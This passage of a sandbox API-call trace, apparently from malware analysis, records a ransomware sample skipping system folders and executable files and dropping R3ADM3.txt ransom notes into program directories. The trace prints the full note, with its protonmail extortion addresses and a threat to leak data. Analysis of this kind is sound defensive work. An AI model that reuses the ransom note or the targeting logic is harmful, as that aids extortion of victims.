ftCreationTime.dwLowDateTime=0x78606f20, ftCreationTime.dwHighDateTime=0x1d5dfb8, ftLastAccessTime.dwLowDateTime=0x5f909a20, ftLastAccessTime.dwHighDateTime=0x1d59124, ftLastWriteTime.dwLowDateTime=0x5f909a20, ftLastWriteTime.dwHighDateTime=0x1d59124, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ccv_server.exe", cAlternateFileName="CCV_SE~1.EXE")) returned 1 [0139.596] lstrcmpW (lpString1="ccv_server.exe", lpString2=".") returned 1 [0139.596] lstrcmpW (lpString1="ccv_server.exe", lpString2="..") returned 1 [0139.596] StrStrIW (lpFirst="ccv_server.exe", lpSrch=".UAKXC") returned 0x0 [0139.596] StrStrIW (lpFirst="ccv_server.exe", lpSrch=".exe") returned=".exe" [0139.596] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Common7", cAlternateFileName="")) returned 1 [0139.596] lstrcmpW (lpString1="Common7", lpString2=".") returned 1 [0139.596] lstrcmpW (lpString1="Common7", lpString2="..") returned 1 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="tmp") returned 0x0 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="winnt") returned 0x0 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="temp") returned 0x0 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="thumb") returned 0x0 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="$Recycle.Bin") returned 0x0 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="System Volume Information") returned 0x0 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="Boot") returned 0x0 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="Windows") returned 0x0 [0139.596] StrStrIW (lpFirst="Common7", lpSrch="Trend Micro") returned 0x0 [0139.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0139.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee770 [0139.597] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0139.597] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee770 | out: hHeap=0xea0000) returned 1 [0139.597] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0139.597] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c18 [0139.597] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd6e0 [0139.597] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0139.597] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d446ba0, ftCreationTime.dwHighDateTime=0x1d5ba4e, ftLastAccessTime.dwLowDateTime=0x82223440, ftLastAccessTime.dwHighDateTime=0x1d5de4f, ftLastWriteTime.dwLowDateTime=0x82223440, ftLastWriteTime.dwHighDateTime=0x1d5de4f, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="omnipos.exe", cAlternateFileName="")) returned 1 [0139.597] lstrcmpW (lpString1="omnipos.exe", lpString2=".") returned 1 [0139.597] lstrcmpW (lpString1="omnipos.exe", lpString2="..") returned 1 [0139.597] StrStrIW (lpFirst="omnipos.exe", lpSrch=".UAKXC") returned 0x0 [0139.597] StrStrIW (lpFirst="omnipos.exe", lpSrch=".exe") returned=".exe" [0139.597] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58657230, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58657230, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58657230, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.597] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.597] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.597] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.597] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.597] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.597] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.597] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.598] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.598] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.598] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SDK", cAlternateFileName="")) returned 1 [0139.598] lstrcmpW (lpString1="SDK", lpString2=".") returned 1 [0139.598] lstrcmpW (lpString1="SDK", lpString2="..") returned 1 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="tmp") returned 0x0 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="winnt") returned 0x0 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="temp") returned 0x0 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="thumb") returned 0x0 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="$Recycle.Bin") returned 0x0 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="System Volume Information") returned 0x0 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="Boot") returned 0x0 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="Windows") returned 0x0 [0139.598] StrStrIW (lpFirst="SDK", lpSrch="Trend Micro") returned 0x0 [0139.598] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0139.598] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee770 [0139.598] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0139.598] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6bc8 [0139.598] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0139.599] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee770 | out: hHeap=0xea0000) returned 1 [0139.599] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0139.599] lstrcmpW (lpString1="VSTA", lpString2=".") returned 1 [0139.599] lstrcmpW (lpString1="VSTA", lpString2="..") returned 1 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="tmp") returned 0x0 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="winnt") returned 0x0 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="temp") returned 0x0 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="thumb") returned 0x0 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="$Recycle.Bin") returned 0x0 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="System Volume Information") returned 0x0 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="Boot") returned 0x0 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="Windows") returned 0x0 [0139.599] StrStrIW (lpFirst="VSTA", lpSrch="Trend Micro") returned 0x0 [0139.599] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee770 [0139.599] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.599] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee770 | out: hHeap=0xea0000) returned 1 [0139.599] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeece50 [0139.599] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee770 [0139.599] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee7e8 | out: hHeap=0xea0000) returned 1 [0139.599] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 0 [0139.600] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e50 | out: hHeap=0xea0000) returned 1 [0139.600] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c40 | out: hHeap=0xea0000) returned 1 [0139.600] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.600] Sleep (dwMilliseconds=0x32) [0139.651] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee6f8 | out: hHeap=0xea0000) returned 1 [0139.651] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee680 | out: hHeap=0xea0000) returned 1 [0139.651] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0139.651] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0139.651] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.651] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0139.652] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0139.652] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c40 [0139.652] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.652] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d10 [0139.652] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.652] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d10 | out: hHeap=0xea0000) returned 1 [0139.652] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.652] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c40 | out: hHeap=0xea0000) returned 1 [0139.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\microsoft.net\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.654] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.654] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.655] CloseHandle (hObject=0x210) returned 1 [0139.656] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.656] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0139.656] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x586ef7b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x586ef7b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.656] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.656] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x586ef7b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x586ef7b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.656] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.656] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.656] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5abe1b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5abe1b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Primary Interop Assemblies", cAlternateFileName="PRIMAR~1")) returned 1 [0139.656] lstrcmpW (lpString1="Primary Interop Assemblies", lpString2=".") returned 1 [0139.656] lstrcmpW (lpString1="Primary Interop Assemblies", lpString2="..") returned 1 [0139.656] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="tmp") returned 0x0 [0139.656] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="winnt") returned 0x0 [0139.657] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="temp") returned 0x0 [0139.657] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="thumb") returned 0x0 [0139.657] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="$Recycle.Bin") returned 0x0 [0139.657] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.657] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="System Volume Information") returned 0x0 [0139.657] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="Boot") returned 0x0 [0139.657] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="Windows") returned 0x0 [0139.657] StrStrIW (lpFirst="Primary Interop Assemblies", lpSrch="Trend Micro") returned 0x0 [0139.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0139.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0139.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd7f0 [0139.657] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.657] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0139.657] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0139.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c40 [0139.657] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd878 [0139.657] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd7f0 | out: hHeap=0xea0000) returned 1 [0139.657] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x586ef7b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x586ef7b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x586ef7b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.657] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.657] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.657] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.657] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.657] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.657] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.657] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.657] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.657] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.657] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a491400, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x9ea84660, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0x9ea84660, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 1 [0139.658] lstrcmpW (lpString1="RedistList", lpString2=".") returned 1 [0139.658] lstrcmpW (lpString1="RedistList", lpString2="..") returned 1 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="tmp") returned 0x0 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="winnt") returned 0x0 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="temp") returned 0x0 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="thumb") returned 0x0 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="$Recycle.Bin") returned 0x0 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="System Volume Information") returned 0x0 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="Boot") returned 0x0 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="Windows") returned 0x0 [0139.658] StrStrIW (lpFirst="RedistList", lpSrch="Trend Micro") returned 0x0 [0139.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeece78 [0139.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0139.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0139.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeece78 | out: hHeap=0xea0000) returned 1 [0139.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeece78 [0139.658] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec080 [0139.658] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.658] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a491400, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x9ea84660, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0x9ea84660, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 0 [0139.659] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.659] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 [0139.659] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.659] Sleep (dwMilliseconds=0x32) [0139.714] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.714] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0139.714] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0139.714] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.714] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0139.714] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.714] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.714] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c68 [0139.715] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.715] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0139.715] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.715] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0139.715] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.715] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 [0139.715] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.717] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.717] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.718] CloseHandle (hObject=0x210) returned 1 [0139.718] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.718] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.718] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x58787d30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58787d30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.719] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.719] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x58787d30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58787d30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.719] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.719] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.719] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef422c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef422c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x23996480, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x4e70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessibleMarshal.dll", cAlternateFileName="ACCESS~1.DLL")) returned 1 [0139.719] lstrcmpW (lpString1="AccessibleMarshal.dll", lpString2=".") returned 1 [0139.719] lstrcmpW (lpString1="AccessibleMarshal.dll", lpString2="..") returned 1 [0139.719] StrStrIW (lpFirst="AccessibleMarshal.dll", lpSrch=".UAKXC") returned 0x0 [0139.719] StrStrIW (lpFirst="AccessibleMarshal.dll", lpSrch=".exe") returned 0x0 [0139.719] StrStrIW (lpFirst="AccessibleMarshal.dll", lpSrch=".dll") returned=".dll" [0139.719] FindNextFileW (in: hFindFile=0xecfbe0, 